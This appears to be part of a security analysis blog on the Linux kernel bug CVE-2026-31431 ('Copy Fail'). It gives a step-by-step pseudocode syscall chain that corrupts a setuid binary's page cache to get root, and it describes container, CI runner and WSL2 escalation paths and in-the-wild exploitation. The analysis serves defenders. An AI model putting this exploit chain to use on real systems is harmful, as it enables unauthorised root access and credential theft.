CVE-2026-31431: From 732 Bytes to Root - Anatomy of a Modern Linux Privilege Escalation
CVE-2026-31431 Copy Fail - The 732-Byte Root: Exploit Mechanics, Syscall Chain, and Multi-Environment Blast Radius
Part 1 established what Copy Fail is and where the root cause lives. Part 2 goes deeper into the mechanics: how 40 iterations of a 4-byte scratch write translate into a root shell, why the page cache is the perfect write target, how the exploit degrades gracefully across different kernel configurations, and what happens when it runs inside containers, Kubernetes worker nodes, and WSL2. This part also covers the active exploitation timeline and what threat actor activity has looked like since April 29, 2026.
The Complete Syscall Chain - Every Step Explained
The exploit is not a single syscall doing something forbidden. It is a legal sequence of operations on legitimate kernel interfaces, each individually permitted for unprivileged users, that together abuse a memory aliasing bug in one specific AEAD algorithm implementation. Understanding each step individually is necessary to understand what detection opportunities exist and why they are limited.
Phase 1 - Establishing the Crypto Socket
# socket() with AF_ALG (family 38) is permitted for any user # SOCK_SEQPACKET=5 provides message-oriented, ordered delivery fd = socket(AF_ALG=38, SOCK_SEQPACKET=5, 0) # Bind to the authencesn AEAD construction # authencesn = authenticated encryption with sequence numbers # Full string: authencesn(hmac(sha256),cbc(aes)) # This is the specific algorithm where req->dst is used as scratch mid-operation bind(fd, { .sa_family = AF_ALG, .alg_type = "aead", .alg_name = "authencesn(hmac(sha256),cbc(aes))", .alg_feat = 0, .alg_mask = 0 }) # setsockopt with SOL_ALG (279) to set key material and IV # Key bytes are not security-sensitive here - they're attacker-controlled # and do not need to be any particular value for the scratch write to occur setsockopt(fd, SOL_ALG=279, ALG_SET_KEY, key_bytes, key_len) setsockopt(fd, SOL_ALG=279, ALG_SET_AEAD_AUTHSIZE, NULL, authsize) # accept() produces the operation file descriptor # All actual crypto work happens on op_fd, not on fd op_fd = accept(fd, NULL, NULL)
socket(AF_ALG, ...), bind(), or setsockopt(SOL_ALG, ...). This is by design. The bug is not in the access control - it is in what happens when a legitimate interface is used with a specific algorithm.
Phase 2 - Preparing the Target File Descriptor
# Open the target setuid binary read-only # Any setuid binary works. /usr/bin/su is the canonical target. # O_RDONLY only - no write permission required or used suid_fd = open("/usr/bin/su", O_RDONLY) # At this point the kernel has already populated page cache for /usr/bin/su # from the last read. The page cache entries are marked as read-only # from a permissions standpoint, but the AEAD operation will bypass this # by going through the crypto subsystem's internal scatterlist, not through # normal VFS write paths (which would check permissions). # fstat to retrieve file size and calculate target page offsets fstat(suid_fd, &stat_buf) file_size = stat_buf.st_size target_pages = ceil(file_size / PAGE_SIZE) payload_offsets = compute_offsets(target_pages) # where to land the 4-byte writes
splice() into an AF_ALG operation file descriptor does not go through the VFS write path. The pages are transferred as a scatterlist directly into the crypto request structure. When the AEAD operation then writes to req->dst - which, because of the 2017 optimization bug, aliases req->src - it is writing through the crypto subsystem's own memory path, not through VFS. The kernel does not re-check write permissions on page cache entries modified this way.
Phase 3 - The Core Loop: 40 Iterations of 4-Byte Corruption
# The exploit iterates ~40 times # Each iteration targets a different byte offset within /usr/bin/su's page cache # Each iteration performs exactly one AEAD operation that produces one 4-byte scratch write for offset in payload_offsets: # ~40 target locations within the binary # Seek to the target offset in the setuid binary lseek(suid_fd, offset, SEEK_SET) # splice() the page cache page at this offset directly into op_fd # count = PAGE_SIZE ensures one full page is spliced # No userspace buffer is involved - pure kernel-to-kernel transfer splice(suid_fd, NULL, op_fd, NULL, PAGE_SIZE, 0) │ └── kernel maps /usr/bin/su page cache page into the AEAD request's src scatterlist because of commit 72548b093ee3, src == dst, so the same page is simultaneously the input AND the output of the crypto operation # sendmsg triggers the actual crypto operation # The IV is crafted to position the authencesn scratch write # at the correct byte offset within the page cache page sendmsg(op_fd, &msg, 0) │ └── authencesn begins processing: reads from req->src partway through, authencesn writes intermediate MAC state into req->dst req->dst == req->src == page cache of /usr/bin/su at offset 4 bytes of attacker-influenced data written into kernel page cache the page is now dirty in memory; the disk file is unchanged # recvmsg drains the output - required to reset op_fd for next iteration recvmsg(op_fd, &msg, 0) # After ~40 iterations: sufficient page cache corruption to redirect execution # The corrupted bytes replace specific instruction bytes within the binary's # .text section as mapped in page cache, causing /usr/bin/su to exec a shell # instead of performing its normal authentication flow
Phase 4 - Detonation
# Close the AF_ALG file descriptors - no longer needed close(op_fd) close(fd) # Execute the corrupted in-memory setuid binary # Because it is setuid root, the kernel executes it as UID 0 # Because its .text segment has been replaced in page cache, # it executes the attacker's payload instead of its normal code execve("/usr/bin/su", ["/usr/bin/su"], envp) Result: root shell (UID 0, GID 0) Time from exploit start to root: under 5 seconds Disk: /usr/bin/su unchanged, sha256sum matches expected value Disk: no new files written, no modules loaded, no temp files
authencesn scratch write width is not attacker-controlled in terms of size - it is a fixed artifact of how the algorithm writes its intermediate MAC state into the destination buffer. What the attacker controls is where each 4-byte write lands, by controlling the IV and the offset passed to lseek() before each splice(). Delivering the complete payload requires enough iterations to overwrite the specific instruction bytes in the target binary that, when replaced, redirect execution to spawn a shell.
Page Cache Mechanics - Why This Is the Perfect Write Target
The Linux page cache is the kernel's primary mechanism for caching file-backed memory. When any process reads a regular file, the kernel populates page cache entries from disk and serves all subsequent reads from those cached pages, avoiding repeated disk I/O. The page cache is global and shared: when process A reads /usr/bin/su and process B later reads /usr/bin/su, they share the same page cache entries. There is exactly one copy of each file page in the kernel's memory at any given time.
This architecture has two consequences that Copy Fail exploits directly:
When the exploit writes into the page cache of /usr/bin/su, that modification is immediately visible to all processes on the system that subsequently execute /usr/bin/su. The corruption is not scoped to the attacker's process. Any process on the system - including ones running as root - that executes the targeted binary after corruption will run the modified in-memory version.
Page cache entries are not automatically flushed back to disk unless they are marked dirty through a write path that goes through the VFS dirty-page mechanism. The AEAD scratch write does not set the page dirty flag through the normal VFS path - it writes directly through the crypto subsystem. The corrupted page may persist in cache indefinitely until memory pressure forces eviction or the system reboots.
Why the Write Does Not Trigger Normal Write-Protection
When userspace opens a file with O_RDONLY and attempts a normal write, the VFS layer checks permissions and rejects it. The AF_ALG pathway completely bypasses this check because the write does not originate from a VFS write call. The sequence is:
splice()transfers the page cache page into the crypto request's scatterlist without going through any write-side VFS hook- The
authencesnalgorithm writes its scratch data intoreq->dstthrough the crypto subsystem's own memory access path - Because
req->dstaliases the page cache page (via the 2017 optimization), the write lands there directly - The kernel never invokes any VFS write path, so no permission check, no inode dirty marking through the normal path, and no filesystem journal entry occurs
What Gets Written and How the Payload Is Structured
The attacker cannot write arbitrary bytes at arbitrary offsets in a single operation. Each iteration delivers exactly 4 bytes at one offset. The payload must therefore be structured such that the target binary's behavior is redirected by the union of approximately 40 such 4-byte patches applied to its in-memory .text segment.
The specific bytes written depend on the algorithm's intermediate MAC state, which is influenced by the key material and IV that the attacker controls via setsockopt(SOL_ALG, ALG_SET_KEY, ...). By choosing appropriate key and IV values, the attacker selects what value lands at each target offset. The exploit selects target offsets that correspond to specific instructions in the setuid binary's compiled code - replacing a conditional branch, a function call target, or a privilege check return value - such that the aggregate mutation causes the binary to execute execve("/bin/sh", ...) with root privileges instead of its normal authentication logic.
| Exploit Parameter | What the Attacker Controls | Mechanism |
|---|---|---|
| Target offsets | Which bytes in the setuid binary get written | lseek() before each splice() |
| Written values | What 4 bytes land at each offset | setsockopt(SOL_ALG, ALG_SET_KEY) and IV in sendmsg CMSG |
| Algorithm string | Which AEAD algorithm triggers the scratch write | bind() alg_name field |
| Target binary | Which setuid binary is corrupted in page cache | open() path argument |
| Iteration count | How many 4-byte patches are delivered | Number of splice/sendmsg/recvmsg cycles in the loop |
/usr/bin/su) ships as a compiled ELF with a predictable .text layout on each distro, the attacker precomputes the per-distro target offsets and includes them in the 732-byte script as a small lookup table. The kernel-level mechanism - the AF_ALG splice path and the authencesn scratch write - is identical on every Linux distribution, so the same syscall sequence works everywhere. Only the target offsets differ between distros, and those are static per binary version.
Container Environments - Scope, Constraints, and Escape Conditions
Copy Fail is a kernel-level vulnerability. Containers on Linux share the host kernel. There is no separate kernel per container, and no container runtime (Docker, containerd, CRI-O, podman) patches or abstracts the kernel's crypto subsystem. If the host kernel is unpatched, every container running on that host is on an unpatched kernel.
Whether Copy Fail translates from container-level code execution to host-level root depends entirely on what seccomp, AppArmor, or SELinux policies are enforced on the container workload. The attack surface has two distinct scenarios.
If the container runtime does not apply a seccomp profile that blocks socket(AF_ALG=38, ...), and no AppArmor or SELinux policy denies AF_ALG socket creation, then Copy Fail runs from inside the container with identical mechanics to a bare host exploitation. The resulting root shell runs as UID 0 in the container namespace, with access to the underlying host filesystem via /proc/1/root, /proc/1/fd, or direct mount namespace traversal from root context.
Independent testing on OpenShift 4.20 with Restricted-v2 Security Context Constraints confirmed that page cache corruption of the host's setuid binaries is achievable from within a restricted container - because the page cache is shared kernel-wide regardless of namespace. However, achieving UID 0 in the host namespace under strict SCC was not reliably accomplished in all tested configurations. The attack surface is real but not universal under maximum restriction.
Kubernetes Node Compromise Path
In a Kubernetes cluster, worker nodes run many pods sharing a single kernel. If an attacker gains code execution in any pod on a node - whether through an application vulnerability, a malicious container image, or a supply chain compromise - and the node kernel is unpatched, the Copy Fail path to host node root follows the same mechanics. The difference from a standalone Linux host is what becomes accessible after root is achieved on the node.
CI/CD Runner Environments
Continuous integration runners - GitHub Actions, GitLab CI, Jenkins agents, CircleCI - represent a particularly high-value attack surface for Copy Fail. CI runners are designed to execute untrusted or semi-trusted code (the job definition from a repository). If a malicious dependency, a compromised workflow file, or a pull request from a malicious contributor contains Copy Fail as part of a build step, the runner kernel is compromised within seconds.
CI runners typically have environment variables injected with cloud credentials, code signing keys, artifact registry tokens, deployment secrets, and API keys. Root access on the runner makes all of these readable from the process environment or the secrets filesystem.
With root on the build runner, an attacker can modify the compiled artifact, container image, or package before it is signed and published. This converts a transient runner compromise into a persistent supply chain backdoor that ships in the next release.
Self-hosted CI runners that reuse the same VM or container across multiple jobs are vulnerable to persistence: root access allows modifying the runner agent binary, injecting into the job execution environment, or installing a kernel-level backdoor that survives individual job teardowns.
Windows Subsystem for Linux 2 - A Real Kernel, a Real Attack Surface
WSL2 is architecturally distinct from WSL1. Where WSL1 used a compatibility translation layer, WSL2 runs an actual Linux kernel inside a lightweight Hyper-V virtual machine. That kernel is a real Linux kernel, maintained by Microsoft, built from upstream sources. It ships with the algif_aead module present and the 2017 optimization commit included.
Any developer, data scientist, or engineer running WSL2 on a Windows 10 or Windows 11 machine prior to the May 2026 Patch Tuesday update was running an unpatched Linux kernel. The copy.fail exploit runs identically in a WSL2 shell. An attacker who obtains code execution in a WSL2 environment - through a compromised development tool, a malicious Python package, a backdoored npm module, or a malicious Jupyter notebook - can escalate to root within that WSL2 VM using the same 732-byte script that works on a bare Ubuntu server.
Copy Fail gives UID 0 within the WSL2 Linux environment. This provides access to the WSL2 filesystem, all files mounted from Windows drives under /mnt/c and similar, and any credentials or secrets stored in WSL2 home directories or accessible via WSL2 interop.
WSL2 mounts the Windows user's home directory and all drives. Root in WSL2 can read and write files accessible to the Windows user including .ssh private keys, browser credential stores reachable via the mounted filesystem, cloud CLI credential files (.aws/credentials, .azure/), and any file the Windows user account can access.
uname -r inside the WSL2 environment - look for a kernel build dated after April 2026.
Active Exploitation Timeline and Threat Actor Activity
Copy Fail is notable among high-severity LPEs for the speed at which the gap between disclosure and confirmed exploitation closed. The timeline from public release to CISA KEV listing is one of the shortest on record for a non-remotely-exploitable vulnerability.
algif_aead optimization as introducing a page cache write primitive reachable from unprivileged AF_ALG sockets. Coordinated disclosure process begins with kernel maintainers and major distribution vendors.algif_aead via kmod. CloudLinux begins rolling out KernelCare livepatches (completed May 1-2).algif_aead module is disclosed shortly after Copy Fail - demonstrating that the security audit of the AF_ALG subsystem triggered by Copy Fail's disclosure uncovered additional issues in the same code region. Splunk publishes SIEM detection blog for both CVEs.Exploitation Characteristics Observed in the Wild
CISA's KEV listing confirms exploitation has occurred. Based on threat intelligence from the May 2026 analysis period, the observed exploitation patterns cluster into several categories:
| Exploitation Category | Target Environment | Post-Escalation Objective |
|---|---|---|
| Opportunistic mass exploitation | Any internet-reachable Linux hosts with SSH brute-force initial access, shared hosting environments | Credential harvesting, cryptocurrency mining, botnet enrollment |
| Cloud workload targeting | EC2 instances, GCE VMs, Azure Linux VMs - particularly those with IMDSv1 enabled | Instance metadata credential theft, lateral movement within cloud accounts |
| CI/CD pipeline targeting | Self-hosted GitHub Actions runners, Jenkins agents, GitLab CI runners | Secret exfiltration, artifact tampering, persistent supply chain access |
| Kubernetes node targeting | Worker nodes in multi-tenant clusters, managed Kubernetes (EKS, GKE, AKS) with unpatched node images | Kubelet credential theft, cross-namespace secret access, node-level persistence |
| Ransomware pre-positioning | Enterprise Linux servers with domain or cloud credentials accessible after root escalation | Credential staging, data exfiltration prior to encryption, lateral movement setup |
Time-to-Exploit Analysis - Why Zero Days Between Disclosure and Weaponization Matters
Most vulnerability disclosures follow a pattern where a window exists between the CVE being published and a working exploit appearing publicly. That window - even if it lasts only 24-48 hours - gives defenders time to triage, prioritize, and push patches before exploitation begins. Copy Fail eliminated this window entirely.
| Metric | Value | Risk Interpretation |
|---|---|---|
| Disclosure to public exploit | 0 days | Simultaneous release - no triage window for defenders |
| Disclosure to confirmed wild exploitation | 2 days | Immediate - KEV listing on May 1 proves real attacks began within 48 hours |
| Disclosure to first vendor patches | 1 day | AlmaLinux patched April 30; most distros within 48-72 hours |
| Patch-to-exploitation gap | Negative | Exploitation began before patches were universally available |
| Vulnerability lifetime before disclosure | ~9 years | Maximum possible silent exploitation window if discovered earlier by threat actors |
| Exploit reliability affecting response urgency | Deterministic | No false-start exploitation attempts - every attempt succeeds on unpatched systems |
